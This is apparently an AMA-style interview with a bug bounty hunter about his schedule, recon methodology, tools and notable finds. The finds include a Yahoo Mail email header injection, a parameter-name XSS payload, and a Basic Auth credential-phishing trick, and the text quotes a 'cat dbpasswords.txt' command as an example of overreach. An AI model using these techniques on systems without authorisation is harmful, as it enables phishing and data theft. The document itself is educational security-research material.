My in real life name is Sam but I go by “zlz” on HackerOne and Twitter. I’m from the central United States and I’ve been hacking for about three years now. I got started after spending some time on a game called “Runescape” and exploiting non-technical logical issues like invisibility through a series of permitted actions within the client. I’m in love with HackerOne as of now and will probably be staying for a while.
At the moment my only obligations I have are my work, girlfriend, and family. I’ll spend pretty much every night (11:00 P.M.-4:00 A.M.) on my computer either reading or hacking stuff, but this will change once the summer is over. If you haven’t already guessed bug bounty is just a hobby for me, but one that consumes a huge portion of my interests. It’s sometimes hard to manage my personal life because I’ll get super obsessed with an endpoint to the point of having it cloud my thoughts the next day. I’ve learned to systematically schedule my day so each event is isolated from one another, but it can be hard to mentally force myself into this pattern.
Each day I’ll spend maybe six hours doing infosec related stuff, but only about two of those are designated to actual hunting. Based on that I’m probably spending anywhere between 14-18 hours hunting bugs. I think it’s very important to spend time reading up on current events and techniques you have little experience with because one day you’ll glance over something during pentesting and either say “hey, I think I know what this is! <insert payload” or if you haven’t been reading that much “that is confusing, but I guess I can come back to it or phone a friend”. I’ll report anywhere between 5 and 15 bugs in a month but lately I’ve been spending more time searching for more critical bugs so that number has dipped.
Seven months, ten duplicates, four N/As, and one valid low severity.
My favorite (and most interesting) bug was when I was able to inject carriage-return line-feed symbols into a Yahoo mail function. What I was able to accomplish was (1) ability to pretend to be any “@yahoo.com”, and (2) spear phish victims using malicious attachments and hyperlinks. This bug was really interesting because I hadn’t ever seen anyone exploiting this nor write about it. It was very similar to HTTP header injection but just with email headers. You can read the writeup here if you’d like.
Thinking back in time a little bit I had two moments when I knew I wanted to get fully involved with bug bounty. The first was when I received a $250 bounty from PornHub after emailing their security handle and stating that they invalidly closed my report, and the second was when I met Jon Bottarini and he invited me to the “bug bounty forum” slack group. It may sound super staged since this AMA is being hosted on bug bounty forum, but when I joined the community I felt super comfortable since everyone was super friendly and resourceful. From that point forward I established relationships with people who are now really close friends. One of my biggest insights as a hacker is that the “HTTP tamper” firefox extension shouldn’t be my go-to proxy tool. For any new hackers out there, please learn how to use BURP Suite. It’s an AWESOME tool that may look a little intimidating at first, but provides such an extensible array of tools that can be used in your day-to-day arsenal. One of the biggest issues I had was overcoming the mental gap of “the vulnerabilities on this host are few and far between, so it’s not worth pentesting”. The way in which I did so was deciding to primarily target the host I was so scared of until I identified SOMETHING vulnerable. It worked because when I did find that vulnerability, I felt as if there were dozens more just around the corner.
I’ll spend a few hours on Twitter reading blogs, articles, and forum listings relative to infosec. I’d really recommend establishing a network of hackers to follow in order to easily get updates and content from within the community.
Of course. I spend a lot of time pentesting on Yahoo with @thedawgyg, speak to @jon_bottarini frequently, and keep in touch with @ibram and @RojanRijal about potential and current projects we’re working on.
Before I ever start a scan (if it’s a new host) I’ll just load the website normally and try to understand its structure. I’ll keep notes of directories that I’ll go back and dir bruteforce later, file extensions, and different servers (noticing altering patterns of nginx, apache, etc.). After a while I’ll switch to a more active session where I’ll check each request one-by-one as well as any areas that I’ve marked as potentially vulnerable (file uploads, update profile, etc.). After a while I’ll brute force subdomains and fingerprint each one individually. The information I’m looking for is anything that will help increase severity of a discovered vulnerability or vulnerabilities themselves. I’d recommend a session spent understanding a host before actively looking for vulnerabilities. If you see something you’ve never seen before then spend some time getting to know it. There have been times where I’ve replicated environments so I could see what would work, wouldn’t work, and the result of each request.
Both yes and no. If I see something that looks vulnerable to something specific, I’ll attack it with whatever’s specific. Most of the time I approach a website with an open mind, but if there’s something individually I want to look for then I’ll orient myself to look for that. I keep references of file upload, image update, and interesting little functions that may one day be vulnerable to something cool (an example is the recent FFmpeg vulnerability).
I’ll use sublist3r and dirsearch, but that’s about it. No. I’d recommend using “PwnBack” for BURP Suite as it allows you to check the site as it was in the past. A lot of the time you’ll discover that developers never deleted that old vulnerable file. I’d love to start developing my own tools but don’t have an issue that I’d like to solve as of now.
I’ll use input like “sleep” when checking for code/command/SQL injection but host a separate domain that logs all DNS requests for SSRF. This area can be iffy, because most of the time you’re attempting one of these server side vulnerabilities there won’t be a window to see what’s going on. My best tip for this is to check the programs policies. If they don’t want you to use an automated scanner, then don’t use an automated scanner. If that’s not listed then by all means use SQLmap to prove that there is in fact a vulnerability. As a hacker you shouldn’t ever overextend your engagement unless explicit permission is granted. There are dozens of stories where people will lose 50-100% of their bounties for sending “cat dbpasswords.txt” instead of “touch iwashere”.
Pretty often. Something that stands out was an XSS I reported on sports.yahoo.com where I was able to inject inside the parameter instead of the parameter value. The request looked something like ?value[“a”]=1, but I changed it to ?value[“<script>”]=1 and it executed. This is a good example because I’ve never seen an automated tool that scans the parameter itself meaning that a pair of human eyes on a “scanned to death” portion of the site is all it really takes to find something interesting.
Yeah of course! There are DOZENS of places to start, but I’d personally suggest developing with a LAMP/WAMP stack (PHP, Apache, MySQL) in order to both create code and break code for those first couple poorly designed applications. I’ve known people who come from reverse engineering backgrounds as well as completely non-technical backgrounds.
I listen to a lot of everything, but mainly Ska.
Breaking and entering - duh. Just kidding. I spend a lot of time job hunting and preparing for college.
After just a few months of doing bug bounty I was able to purchase a car that everyone in my family uses. We used to be somewhat financially bent, but things have progressed since then. I’ve been working less at my fast food job and focusing more on school/career related ventures.
Nothing comes easy. Sure - maybe you hit the jackpot and find something by mistake - but that won’t repeat often. If you dedicate your time towards widening your scope of knowledge instead of slashing a knife at a program blindfolded you’re more likely to make a career out of it.
Low level stuff! Assembly! C! If it deals with memory, I couldn’t tell you more than a couple sentences about it.
Cinnamon and butter!
Having something marked as invalid because it fell under the realm of “social engineering” through existing as a technical attack. Note: this was not me attempting to talk to a staff member, but an embeddable image being used to trigger “HTTP 401 Basic Authentication” on every page on the website. You seriously couldn’t browse without being asked to enter credentials that would go to my domain, and in addition it logged your browser agent and IP address.
I’d probably pick @dawgyg. He’s a great hacker and we have matching approaches that work well together.
Additional documentation, tutorials, and demonstrations on how to manage taxes. There are a lot of people making a lot of money who don’t know anything about taxes.
Notepad++. I’m a windows fan boy.